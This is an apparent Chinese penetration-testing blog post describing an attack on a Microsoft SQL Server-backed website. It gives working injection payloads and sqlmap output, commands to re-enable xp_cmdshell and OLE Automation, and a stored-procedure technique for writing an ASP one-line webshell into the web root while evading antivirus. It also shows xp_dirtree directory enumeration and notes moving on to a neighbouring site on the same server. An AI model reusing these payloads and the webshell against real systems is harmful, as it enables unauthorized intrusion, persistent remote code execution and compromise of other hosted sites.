https://www.cnblogs.com/zpchcbd/p/12167244.html

;if(selectIS_SRVROLEMEMBER('sysadmin'))=1WAITFOR DELAY'0:0:05'--

[18:39:23] [INFO] checking if xp_cmdshell extended procedure is available, please wait..xp_cmdshell extended procedure does not seem to be available. Do you want sqlmap to try to re-enable it? [Y/n] Y[18:39:25] [WARNING] xp_cmdshell re-enabling failed

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;os-shell> exec master..xp_cmdshell "whoami"

EXEC sp_configure 'show advanced options', 1;  RECONFIGURE WITH OVERRIDE;  EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;  EXEC sp_configure 'show advanced options', 0;

0x02 提权

连接下3389发现确实是有杀毒存在

所知道的利用xp_cmdshell、spsp_OACreate COM组件之类的进行执行命令都会被杀毒拦截，只能从别的方面下手

既然是dbo的权限那么也可以尝试通过差异备份等等的方法来绕过杀毒，这里利用的是存储过程来写文件

declare @o int, @f int, @t int, @ret intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\muma.asp', 1exec @ret = sp_oamethod @f, 'writeline', NULL,'<%execute(request("a"))%>' 

因为这里自己已经读到了权限dbo的密码，所以是直接用navicat上直接操作

execute master..xp_dirtree 'c:'        //列出所有c:\文件和目录,子目录 execute master..xp_dirtree 'c:',1      //只列c:\文件夹 execute master..xp_dirtree 'c:',1,1    //列c:\文件夹加文件

通过以上的操作来寻找目录的地址，然后通过以上的操作来写文件就可以了

后来通过同服旁站的查询发现另外一个站点上的目录上文件有报错，同样可以发现路径来尝试写到另一个站点上，高权限

 热文推荐  

• 蓝队应急响应姿势之Linux
  

• 通过DNSLOG回显验证漏洞
  

• 记一次服务器被种挖矿溯源
  

• 内网渗透初探 | 小白简单学习内网渗透
  

• 实战|通过恶意 pdf 执行 xss 漏洞
  

• 免杀技术有一套（免杀方法大集结）(Anti-AntiVirus)
  

• 内网渗透之内网信息查看常用命令
  

• 关于漏洞的基础知识
  

• 任意账号密码重置的6种方法
  

• 干货 | 横向移动与域控权限维持方法总汇
  

• 手把手教你Linux提权